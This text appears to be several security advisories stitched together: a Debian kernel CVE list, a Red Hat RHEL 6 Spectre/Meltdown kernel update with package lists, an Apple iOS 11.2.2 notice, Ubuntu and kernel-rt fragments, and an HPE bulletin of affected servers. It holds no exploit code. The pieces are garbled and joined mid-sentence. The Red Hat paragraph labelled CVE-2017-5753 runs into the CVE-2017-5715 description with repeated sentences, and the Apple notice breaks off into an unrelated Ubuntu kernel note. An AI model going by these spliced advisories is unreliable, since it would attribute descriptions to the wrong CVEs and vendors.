\n\nCVE-2018-5332\n\n    Mohamed Ghannam reported that the RDS protocol did not\n    sufficiently validate RDMA requests, leading to an out-of-bounds\n    write.  A local attacker on a system with the rds module loaded\n    could use this for denial of service or possibly for privilege\n    escalation. \n\nCVE-2018-5333\n\n    Mohamed Ghannam reported that the RDS protocol did not properly\n    handle an error case, leading to a null pointer dereference.  A\n    local attacker on a system with the rds module loaded could\n    possibly use this for denial of service. \n\nCVE-2018-5750\n\n    Wang Qize reported that the ACPI sbshc driver logged a kernel heap\n    address. \n\nCVE-2018-5803\n\n    Alexey Kodanev reported that the SCTP protocol did not range-check\n    the length of chunks to be created.  A local or remote user could\n    use this to cause a denial of service. \n\nCVE-2018-6927\n\n    Li Jinyue reported that the FUTEX_REQUEUE operation on futexes did\n    not check for negative parameter values, which might lead to a\n    denial of service or other security impact. \n\nCVE-2018-7492\n\n    The syzkaller tool found that the RDS protocol was lacking a null\n    pointer check.  A local attacker on a system with the rds module\n    loaded could use this for denial of service. \n\nCVE-2018-7566\n\n    Fan LongFei reported a race condition in the ALSA (sound)\n    sequencer core, between write and ioctl operations.  This could\n    lead to an out-of-bounds access or use-after-free.  A local user\n    with access to a sequencer device could use this for denial of\n    service or possibly for privilege escalation. \n\nCVE-2018-7740\n\n    Nic Losby reported that the hugetlbfs filesystem\u0027s mmap operation\n    did not properly range-check the file offset.  A local user with\n    access to files on a hugetlbfs filesystem could use this to cause\n    a denial of service. \n\nCVE-2018-7757\n\n    Jason Yan reported a memory leak in the SAS (Serial-Attached\n    SCSI) subsystem.  A local user on a system with SAS devices\n    could use this to cause a denial of service. \n\nCVE-2018-7995\n\n    Seunghun Han reported a race condition in the x86 MCE\n    (Machine Check Exception) driver.  This is unlikely to have\n    any security impact. \n\nCVE-2018-8781\n\n    Eyal Itkin reported that the udl (DisplayLink) driver\u0027s mmap\n    operation did not properly range-check the file offset.  A local\n    user with access to a udl framebuffer device could exploit this to\n    overwrite kernel memory, leading to privilege escalation. \n\nCVE-2018-8822\n\n    Dr Silvio Cesare of InfoSect reported that the ncpfs client\n    implementation did not validate reply lengths from the server.  An\n    ncpfs server could use this to cause a denial of service or\n    remote code execution in the client. \n\nCVE-2018-1000004\n\n    Luo Quan reported a race condition in the ALSA (sound) sequencer\n    core, between multiple ioctl operations.  This could lead to a\n    deadlock or use-after-free.  A local user with access to a\n    sequencer device could use this for denial of service or possibly\n    for privilege escalation. \n\nCVE-2018-1000199\n\n    Andy Lutomirski discovered that the ptrace subsystem did not\n    sufficiently validate hardware breakpoint settings.  Local users\n    can use this to cause a denial of service, or possibly for\n    privilege escalation, on x86 (amd64 and i386) and possibly other\n    architectures. \n\nFor the oldstable distribution (jessie), these problems have been fixed\nin version 3.16.56-1. \n\nWe recommend that you upgrade your linux packages. \n\nFor the detailed security status of linux please refer to its security\ntracker page at:\nhttps://security-tracker.debian.org/tracker/linux\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n-----BEGIN PGP SIGNATURE-----\n\niQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAlron61fFIAAAAAALgAo\naXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2\nNDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND\nz0Rtqw//Xf/L4bP65wU9M59Ef6xBt+Eph+yxeMsioGhu80ODdMemlmHzASMtfZjY\nAXxyt9l8lbHn8MmwDA4aLhhwHYXwvKATdpHSy1SILrRfb4s9P9uV1vsHaIeZ649E\nhDyNon9hP2tPso6BwqiYHZZy9Xxtd+T8vTBeBZwUKOLBkBRvV/gyNSUdJWp6L8WH\naF4D1hHl9ZotDkyIvkubbx77aqbJ88I4R0n69x7L9udFbuXa+U7hV6dJdnpzyl/7\nOukJfEtnkaUgWu0MdOfFss6iH5OQISn/y/ricRi29oKQiEp3YwnT5J9pFwSQeJJS\nH8ABVt251UoS0J+of3QWw0muOT/6UAF8SNpPKMJXC7Euq8pTmYVPSIeUYf4eqn65\nUHZSCKXaszItq+uzVNYdkj504BJ4cG1lFxZtlrFWwKE8p7QOETN0GKvTRdu/SvDd\nHl2nb4HouLpBYS518Th2/MGgzhXXAuO12MH3smenptZbqxKn9Z0XSTJYzFupgJk/\nkKF2xkDFBE4toTLVE+6XdUKwYk4vkeDZyOGOwRYThSkKAzrUh5zThgal4HnknD2A\n5ye4XLhjgSIT47/nmor6lhxd7WGXGkV33GF0azYlHr/sclfzxcU2Ev3NUBWQ8M3s\nCxfIO0FNCzO0WIUf40md7MlIAnDBIRGyYgNIIe7AnSRKKPykEx8=\n=wNQS\n-----END PGP SIGNATURE-----\n. Summary:\n\nAn update for kernel is now available for Red Hat Enterprise Linux 6. \n\nRed Hat Product Security has rated this update as having a security impact\nof Important. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Desktop (v. 6) - i386, noarch, x86_64\nRed Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64\nRed Hat Enterprise Linux HPC Node (v. 6) - noarch, x86_64\nRed Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64\nRed Hat Enterprise Linux Server (v. 6) - i386, noarch, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Workstation (v. 6) - i386, noarch, x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64\n\n3. \n\nSecurity Fix(es):\n\nAn industry-wide issue was found in the way many modern microprocessor\ndesigns have implemented speculative execution of instructions (a commonly\nused performance optimization). There are three primary variants of the\nissue which differ in the way the speculative execution can be exploited. \n\nNote: This issue is present in hardware and cannot be fully fixed via\nsoftware update. The updated kernel packages provide software mitigation\nfor this hardware issue at a cost of potential performance penalty. Please\nrefer to References section for further information about this issue and\nthe performance impact. \n\nIn this update mitigations for x86-64 architecture are provided. \n\nVariant CVE-2017-5753 triggers the speculative execution by performing a\nbounds-check bypass. It relies on the presence of a precisely-defined\ninstruction sequence in the privileged code as well as the fact that memory\naccesses may cause allocation into the microprocessor\u0027s data cache even for\nspeculatively executed instructions that never actually commit (retire). As\na result, an unprivileged attacker could use this flaw to cross the syscall\nboundary and read privileged memory by conducting targeted cache\nside-channel attacks. It relies on the presence of a precisely-defined\ninstruction sequence in the privileged code as well as the fact that memory\naccesses may cause allocation into the microprocessor\u0027s data cache even for\nspeculatively executed instructions that never actually commit (retire). As\na result, an unprivileged attacker could use this flaw to cross the syscall\nand guest/host boundaries and read privileged memory by conducting targeted\ncache side-channel attacks. (CVE-2017-5715, Important)\n\nVariant CVE-2017-5754 relies on the fact that, on impacted microprocessors,\nduring speculative execution of instruction permission faults, exception\ngeneration triggered by a faulting access is suppressed until the\nretirement of the whole instruction block. In a combination with the fact\nthat memory accesses may populate the cache even when the block is being\ndropped and never committed (executed), an unprivileged local attacker\ncould use this flaw to read privileged (kernel space) memory by conducting\ntargeted cache side-channel attacks. (CVE-2017-5754, Important)\n\nNote: CVE-2017-5754 affects Intel x86-64 microprocessors. AMD x86-64\nmicroprocessors are not affected by this issue. \n\nRed Hat would like to thank Google Project Zero for reporting these issues. \n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe system must be rebooted for this update to take effect. \n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1519778 - CVE-2017-5753 hw: cpu: speculative execution bounds-check bypass\n1519780 - CVE-2017-5715 hw: cpu: speculative execution branch target injection\n1519781 - CVE-2017-5754 hw: cpu: speculative execution permission faults handling\n\n6. Package List:\n\nRed Hat Enterprise Linux Desktop (v. 6):\n\nSource:\nkernel-2.6.32-696.18.7.el6.src.rpm\n\ni386:\nkernel-2.6.32-696.18.7.el6.i686.rpm\nkernel-debug-2.6.32-696.18.7.el6.i686.rpm\nkernel-debug-debuginfo-2.6.32-696.18.7.el6.i686.rpm\nkernel-debug-devel-2.6.32-696.18.7.el6.i686.rpm\nkernel-debuginfo-2.6.32-696.18.7.el6.i686.rpm\nkernel-debuginfo-common-i686-2.6.32-696.18.7.el6.i686.rpm\nkernel-devel-2.6.32-696.18.7.el6.i686.rpm\nkernel-headers-2.6.32-696.18.7.el6.i686.rpm\nperf-2.6.32-696.18.7.el6.i686.rpm\nperf-debuginfo-2.6.32-696.18.7.el6.i686.rpm\npython-perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm\n\nnoarch:\nkernel-abi-whitelists-2.6.32-696.18.7.el6.noarch.rpm\nkernel-doc-2.6.32-696.18.7.el6.noarch.rpm\nkernel-firmware-2.6.32-696.18.7.el6.noarch.rpm\n\nx86_64:\nkernel-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debug-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debug-debuginfo-2.6.32-696.18.7.el6.i686.rpm\nkernel-debug-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debug-devel-2.6.32-696.18.7.el6.i686.rpm\nkernel-debug-devel-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debuginfo-2.6.32-696.18.7.el6.i686.rpm\nkernel-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debuginfo-common-i686-2.6.32-696.18.7.el6.i686.rpm\nkernel-debuginfo-common-x86_64-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-devel-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-headers-2.6.32-696.18.7.el6.x86_64.rpm\nperf-2.6.32-696.18.7.el6.x86_64.rpm\nperf-debuginfo-2.6.32-696.18.7.el6.i686.rpm\nperf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\npython-perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm\npython-perf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\n\nRed Hat Enterprise Linux Desktop Optional (v. 6):\n\ni386:\nkernel-debug-debuginfo-2.6.32-696.18.7.el6.i686.rpm\nkernel-debuginfo-2.6.32-696.18.7.el6.i686.rpm\nkernel-debuginfo-common-i686-2.6.32-696.18.7.el6.i686.rpm\nperf-debuginfo-2.6.32-696.18.7.el6.i686.rpm\npython-perf-2.6.32-696.18.7.el6.i686.rpm\npython-perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm\n\nx86_64:\nkernel-debug-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debuginfo-common-x86_64-2.6.32-696.18.7.el6.x86_64.rpm\nperf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\npython-perf-2.6.32-696.18.7.el6.x86_64.rpm\npython-perf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node (v. 6):\n\nSource:\nkernel-2.6.32-696.18.7.el6.src.rpm\n\nnoarch:\nkernel-abi-whitelists-2.6.32-696.18.7.el6.noarch.rpm\nkernel-doc-2.6.32-696.18.7.el6.noarch.rpm\nkernel-firmware-2.6.32-696.18.7.el6.noarch.rpm\n\nx86_64:\nkernel-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debug-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debug-debuginfo-2.6.32-696.18.7.el6.i686.rpm\nkernel-debug-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debug-devel-2.6.32-696.18.7.el6.i686.rpm\nkernel-debug-devel-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debuginfo-2.6.32-696.18.7.el6.i686.rpm\nkernel-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debuginfo-common-i686-2.6.32-696.18.7.el6.i686.rpm\nkernel-debuginfo-common-x86_64-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-devel-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-headers-2.6.32-696.18.7.el6.x86_64.rpm\nperf-2.6.32-696.18.7.el6.x86_64.rpm\nperf-debuginfo-2.6.32-696.18.7.el6.i686.rpm\nperf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\npython-perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm\npython-perf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node Optional (v. 6):\n\nx86_64:\nkernel-debug-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debuginfo-common-x86_64-2.6.32-696.18.7.el6.x86_64.rpm\nperf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\npython-perf-2.6.32-696.18.7.el6.x86_64.rpm\npython-perf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 6):\n\nSource:\nkernel-2.6.32-696.18.7.el6.src.rpm\n\ni386:\nkernel-2.6.32-696.18.7.el6.i686.rpm\nkernel-debug-2.6.32-696.18.7.el6.i686.rpm\nkernel-debug-debuginfo-2.6.32-696.18.7.el6.i686.rpm\nkernel-debug-devel-2.6.32-696.18.7.el6.i686.rpm\nkernel-debuginfo-2.6.32-696.18.7.el6.i686.rpm\nkernel-debuginfo-common-i686-2.6.32-696.18.7.el6.i686.rpm\nkernel-devel-2.6.32-696.18.7.el6.i686.rpm\nkernel-headers-2.6.32-696.18.7.el6.i686.rpm\nperf-2.6.32-696.18.7.el6.i686.rpm\nperf-debuginfo-2.6.32-696.18.7.el6.i686.rpm\npython-perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm\n\nnoarch:\nkernel-abi-whitelists-2.6.32-696.18.7.el6.noarch.rpm\nkernel-doc-2.6.32-696.18.7.el6.noarch.rpm\nkernel-firmware-2.6.32-696.18.7.el6.noarch.rpm\n\nppc64:\nkernel-2.6.32-696.18.7.el6.ppc64.rpm\nkernel-bootwrapper-2.6.32-696.18.7.el6.ppc64.rpm\nkernel-debug-2.6.32-696.18.7.el6.ppc64.rpm\nkernel-debug-debuginfo-2.6.32-696.18.7.el6.ppc64.rpm\nkernel-debug-devel-2.6.32-696.18.7.el6.ppc64.rpm\nkernel-debuginfo-2.6.32-696.18.7.el6.ppc64.rpm\nkernel-debuginfo-common-ppc64-2.6.32-696.18.7.el6.ppc64.rpm\nkernel-devel-2.6.32-696.18.7.el6.ppc64.rpm\nkernel-headers-2.6.32-696.18.7.el6.ppc64.rpm\nperf-2.6.32-696.18.7.el6.ppc64.rpm\nperf-debuginfo-2.6.32-696.18.7.el6.ppc64.rpm\npython-perf-debuginfo-2.6.32-696.18.7.el6.ppc64.rpm\n\ns390x:\nkernel-2.6.32-696.18.7.el6.s390x.rpm\nkernel-debug-2.6.32-696.18.7.el6.s390x.rpm\nkernel-debug-debuginfo-2.6.32-696.18.7.el6.s390x.rpm\nkernel-debug-devel-2.6.32-696.18.7.el6.s390x.rpm\nkernel-debuginfo-2.6.32-696.18.7.el6.s390x.rpm\nkernel-debuginfo-common-s390x-2.6.32-696.18.7.el6.s390x.rpm\nkernel-devel-2.6.32-696.18.7.el6.s390x.rpm\nkernel-headers-2.6.32-696.18.7.el6.s390x.rpm\nkernel-kdump-2.6.32-696.18.7.el6.s390x.rpm\nkernel-kdump-debuginfo-2.6.32-696.18.7.el6.s390x.rpm\nkernel-kdump-devel-2.6.32-696.18.7.el6.s390x.rpm\nperf-2.6.32-696.18.7.el6.s390x.rpm\nperf-debuginfo-2.6.32-696.18.7.el6.s390x.rpm\npython-perf-debuginfo-2.6.32-696.18.7.el6.s390x.rpm\n\nx86_64:\nkernel-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debug-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debug-debuginfo-2.6.32-696.18.7.el6.i686.rpm\nkernel-debug-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debug-devel-2.6.32-696.18.7.el6.i686.rpm\nkernel-debug-devel-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debuginfo-2.6.32-696.18.7.el6.i686.rpm\nkernel-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debuginfo-common-i686-2.6.32-696.18.7.el6.i686.rpm\nkernel-debuginfo-common-x86_64-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-devel-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-headers-2.6.32-696.18.7.el6.x86_64.rpm\nperf-2.6.32-696.18.7.el6.x86_64.rpm\nperf-debuginfo-2.6.32-696.18.7.el6.i686.rpm\nperf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\npython-perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm\npython-perf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 6):\n\ni386:\nkernel-debug-debuginfo-2.6.32-696.18.7.el6.i686.rpm\nkernel-debuginfo-2.6.32-696.18.7.el6.i686.rpm\nkernel-debuginfo-common-i686-2.6.32-696.18.7.el6.i686.rpm\nperf-debuginfo-2.6.32-696.18.7.el6.i686.rpm\npython-perf-2.6.32-696.18.7.el6.i686.rpm\npython-perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm\n\nppc64:\nkernel-debug-debuginfo-2.6.32-696.18.7.el6.ppc64.rpm\nkernel-debuginfo-2.6.32-696.18.7.el6.ppc64.rpm\nkernel-debuginfo-common-ppc64-2.6.32-696.18.7.el6.ppc64.rpm\nperf-debuginfo-2.6.32-696.18.7.el6.ppc64.rpm\npython-perf-2.6.32-696.18.7.el6.ppc64.rpm\npython-perf-debuginfo-2.6.32-696.18.7.el6.ppc64.rpm\n\ns390x:\nkernel-debug-debuginfo-2.6.32-696.18.7.el6.s390x.rpm\nkernel-debuginfo-2.6.32-696.18.7.el6.s390x.rpm\nkernel-debuginfo-common-s390x-2.6.32-696.18.7.el6.s390x.rpm\nkernel-kdump-debuginfo-2.6.32-696.18.7.el6.s390x.rpm\nperf-debuginfo-2.6.32-696.18.7.el6.s390x.rpm\npython-perf-2.6.32-696.18.7.el6.s390x.rpm\npython-perf-debuginfo-2.6.32-696.18.7.el6.s390x.rpm\n\nx86_64:\nkernel-debug-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debuginfo-common-x86_64-2.6.32-696.18.7.el6.x86_64.rpm\nperf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\npython-perf-2.6.32-696.18.7.el6.x86_64.rpm\npython-perf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 6):\n\nSource:\nkernel-2.6.32-696.18.7.el6.src.rpm\n\ni386:\nkernel-2.6.32-696.18.7.el6.i686.rpm\nkernel-debug-2.6.32-696.18.7.el6.i686.rpm\nkernel-debug-debuginfo-2.6.32-696.18.7.el6.i686.rpm\nkernel-debug-devel-2.6.32-696.18.7.el6.i686.rpm\nkernel-debuginfo-2.6.32-696.18.7.el6.i686.rpm\nkernel-debuginfo-common-i686-2.6.32-696.18.7.el6.i686.rpm\nkernel-devel-2.6.32-696.18.7.el6.i686.rpm\nkernel-headers-2.6.32-696.18.7.el6.i686.rpm\nperf-2.6.32-696.18.7.el6.i686.rpm\nperf-debuginfo-2.6.32-696.18.7.el6.i686.rpm\npython-perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm\n\nnoarch:\nkernel-abi-whitelists-2.6.32-696.18.7.el6.noarch.rpm\nkernel-doc-2.6.32-696.18.7.el6.noarch.rpm\nkernel-firmware-2.6.32-696.18.7.el6.noarch.rpm\n\nx86_64:\nkernel-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debug-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debug-debuginfo-2.6.32-696.18.7.el6.i686.rpm\nkernel-debug-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debug-devel-2.6.32-696.18.7.el6.i686.rpm\nkernel-debug-devel-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debuginfo-2.6.32-696.18.7.el6.i686.rpm\nkernel-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debuginfo-common-i686-2.6.32-696.18.7.el6.i686.rpm\nkernel-debuginfo-common-x86_64-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-devel-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-headers-2.6.32-696.18.7.el6.x86_64.rpm\nperf-2.6.32-696.18.7.el6.x86_64.rpm\nperf-debuginfo-2.6.32-696.18.7.el6.i686.rpm\nperf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\npython-perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm\npython-perf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 6):\n\ni386:\nkernel-debug-debuginfo-2.6.32-696.18.7.el6.i686.rpm\nkernel-debuginfo-2.6.32-696.18.7.el6.i686.rpm\nkernel-debuginfo-common-i686-2.6.32-696.18.7.el6.i686.rpm\nperf-debuginfo-2.6.32-696.18.7.el6.i686.rpm\npython-perf-2.6.32-696.18.7.el6.i686.rpm\npython-perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm\n\nx86_64:\nkernel-debug-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debuginfo-common-x86_64-2.6.32-696.18.7.el6.x86_64.rpm\nperf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\npython-perf-2.6.32-696.18.7.el6.x86_64.rpm\npython-perf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security.  Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/updates/classification/#important\nhttps://access.redhat.com/security/vulnerabilities/speculativeexecution\nhttps://access.redhat.com/security/cve/CVE-2017-5753\nhttps://access.redhat.com/security/cve/CVE-2017-5715\nhttps://access.redhat.com/security/cve/CVE-2017-5754\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2018 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niD8DBQFaTXwuXlSAg2UNWIIRAp3LAKCNdSqjVu7zsXcUTnpGuuQAuUlTpwCfTE/O\nOR+iGnoY+cALbsBWKwbmzQM=\n=V4ow\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA512\n\nAPPLE-SA-2018-1-8-1 iOS 11.2.2\n\niOS 11.2.2 is now available and and addresses the following:\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod\ntouch 6th generation\nDescription: iOS 11.2.2 includes security improvements to Safari and\nWebKit to mitigate the effects of Spectre (CVE-2017-5753 and\nCVE-2017-5715). Make sure you have an\nInternet connection and have installed the latest version of iTunes\nfrom https://www.apple.com/itunes/\n\niTunes and Software Update on the device will automatically check\nApple\u0027s update server on its weekly schedule. When an update is\ndetected, it is downloaded and the option to be installed is\npresented to the user when the iOS device is docked. We recommend\napplying the update immediately if possible. Selecting Don\u0027t Install\nwill present the option the next time you connect your iOS device. \n\nThe automatic update process may take up to a week depending on the\nday that iTunes or the device checks for updates. You may manually\nobtain the update via the Check for Updates button within iTunes, or\nthe Software Update on your device. \n\nTo check that the iPhone, iPod touch, or iPad has been updated:\n\n* Navigate to Settings\n* Select General\n* Select About. \n\nATTENTION: Due to an unavoidable ABI change the kernel updates have\nbeen given a new version number, which requires you to recompile and\nreinstall all third party kernel modules you might have installed. \nUnless you manually uninstalled the standard kernel metapackages\n(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,\nlinux-powerpc), a standard system upgrade will automatically perform\nthis as well. Description:\n\nThe kernel-rt packages provide the Real Time Linux Kernel, which enables\nfine-tuning for systems with extremely high determinism requirements. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\nNote: the current version of the following document is available here:\nhttps://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbhf03805en_us\n\nSUPPORT COMMUNICATION - SECURITY BULLETIN\n\nDocument ID: hpesbhf03805en_us\nVersion: 7\n\nHPESBHF03805 rev.7 - Certain HPE products using Microprocessors from Intel,\nAMD, and ARM, with Speculative Execution, Elevation of Privilege and\nInformation Disclosure. \n\nNOTICE: The information in this Security Bulletin should be acted upon as\nsoon as possible. \n\nRelease Date: 2018-01-23\nLast Updated: 2018-01-22\n\nPotential Security Impact: Local: Disclosure of Information, Elevation of\nPrivilege\n\nSource: Hewlett Packard Enterprise, Product Security Response Team\n\nVULNERABILITY SUMMARY\nOn January 3 2018, side-channel security vulnerabilities involving\nspeculative execution were publicly disclosed. These vulnerabilities may\nimpact the listed HPE products, potentially leading to information disclosure\nand elevation of privilege. Mitigation and resolution of these\nvulnerabilities may call for both an operating system update, provided by the\nOS vendor, and a system ROM update from HPE. \n\n\n**Note:**\n\n  * This issue takes advantage of techniques commonly used in many modern\nprocessor architectures.  \n  * For further information, microprocessor vendors have provided security\nadvisories:\n  \n    - Intel:\n\u003chttps://security-center.intel.com/advisory.aspx?intelid=intel-sa-00088\u0026langu\ngeid=en-fr\u003e\n    - AMD: \u003chttp://www.amd.com/en/corporate/speculative-execution\u003e\n    - ARM: \u003chttps://developer.arm.com/support/security-update\u003e\n\nReferences:\n\n  - CVE-2017-5715 - aka Spectre, branch target injection\n  - CVE-2017-5753 - aka Spectre,  bounds check bypass\n  - CVE-2017-5754 - aka  Meltdown,  rogue data cache load, memory access\npermission check performed after kernel memory read\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \n\n  - HPE ProLiant DL380 Gen10 Server  - To be delivered\n  - HPE ProLiant DL180 Gen10 Server  - To be delivered\n  - HPE ProLiant DL160 Gen10 Server  - To be delivered\n  - HPE ProLiant DL360 Gen10 Server - To be delivered\n  - HPE ProLiant ML110 Gen10 Server  - To be delivered\n  - HPE ProLiant DL580 Gen10 Server  - To be delivered\n  - HPE ProLiant DL560 Gen10 Server  - To be delivered\n  - HPE ProLiant DL120 Gen10 Server  - To be delivered\n  - HPE ProLiant ML350 Gen10 Server  - To be delivered\n  - HPE ProLiant XL450 Gen10 Server  - To be delivered\n  - HPE Synergy 660 Gen10 Compute Module  - To be delivered\n  - HPE ProLiant DL385 Gen10 Server - prior to v1.04 \n  - HPE ProLiant XL170r Gen10 Server  - To be delivered\n  - HPE ProLiant BL460c Gen10 Server Blade  - To be delivered\n  - HPE ProLiant XL190r Gen10 Server  - To be delivered\n  - HPE ProLiant XL230k Gen10 Server  - To be delivered\n  - HPE Synergy 480 Gen10 Compute Module  - To be delivered\n  - HPE ProLiant XL730f Gen9 Server  - To be delivered\n  - HPE ProLiant XL230a Gen9 Server  - To be delivered\n  - HPE ProLiant XL740f Gen9 Server  - To be delivered\n  - HPE ProLiant XL750f Gen9 Server  - To be delivered\n  - HPE ProLiant XL170r Gen9 Server - To be delivered\n  - HP ProLiant DL60 Gen9 Server - To be delivered\n  - HP ProLiant DL160 Gen9 Server - To be delivered\n  - HPE ProLiant DL360 Gen9 Server - To be delivered\n  - HP ProLiant DL380 Gen9 Server - To be delivered\n  - HPE ProLiant XL450 Gen9 Server - To be delivered\n  - HPE Apollo 4200 Gen9 Server - To be delivered\n  - HP ProLiant BL460c Gen9 Server Blade - To be delivered\n  - HP ProLiant ML110 Gen9 Server - To be delivered\n  - HP ProLiant ML150 Gen9 Server - To be delivered\n  - HPE ProLiant ML350 Gen9 Server - To be delivered\n  - HP ProLiant DL120 Gen9 Server - To be delivered\n  - HPE ProLiant DL560 Gen9 Server - To be delivered\n  - HP ProLiant BL660c Gen9 Server - To be delivered\n  - HPE ProLiant ML30 Gen9 Server - To be delivered\n  - HPE ProLiant XL170r Gen10 Server - To be delivered\n  - HPE ProLiant DL20 Gen9 Server - To be delivered\n  - HPE Synergy 660 Gen9 Compute Module - To be delivered\n  - HPE Synergy 480 Gen9 Compute Module - To be delivered\n  - HPE ProLiant XL250a Gen9 Server - To be delivered\n  - HPE ProLiant XL190r Gen9 Server - To be delivered\n  - HP ProLiant DL80 Gen9 Server - To be delivered\n  - HPE ProLiant DL180 Gen9 Server - To be delivered\n  - HPE ProLiant XL270d Gen9 Accelerator Tray 2U Configure-to-order Server -\nTo be delivered\n  - HPE ProLiant WS460c Gen9 Workstation - To be delivered\n  - HPE ProLiant XL260a Gen9 Server - To be delivered\n  - HPE Synergy 620 Gen9 Compute Module - To be delivered\n  - HPE ProLiant DL580 Gen9 Server - To be delivered\n  - HP ProLiant XL220a Gen8 v2 Server - To be delivered\n  - HPE Synergy 680 Gen9 Compute Module - To be delivered\n  - HPE ProLiant m510 Server Cartridge - To be delivered\n  - HPE ProLiant m710p Server Cartridge - To be delivered\n  - HPE ProLiant m710x Server Cartridge - To be delivered\n  - HP ProLiant m710 Server Cartridge - To be delivered\n  - HP ProLiant DL980 G7 Server - To be delivered\n  - HPE Synergy Composer - To be delivered\n  - HPE ProLiant Thin Micro TM200 Server - To be delivered\n  - HPE ProLiant ML10 v2 Server - To be delivered\n  - HPE 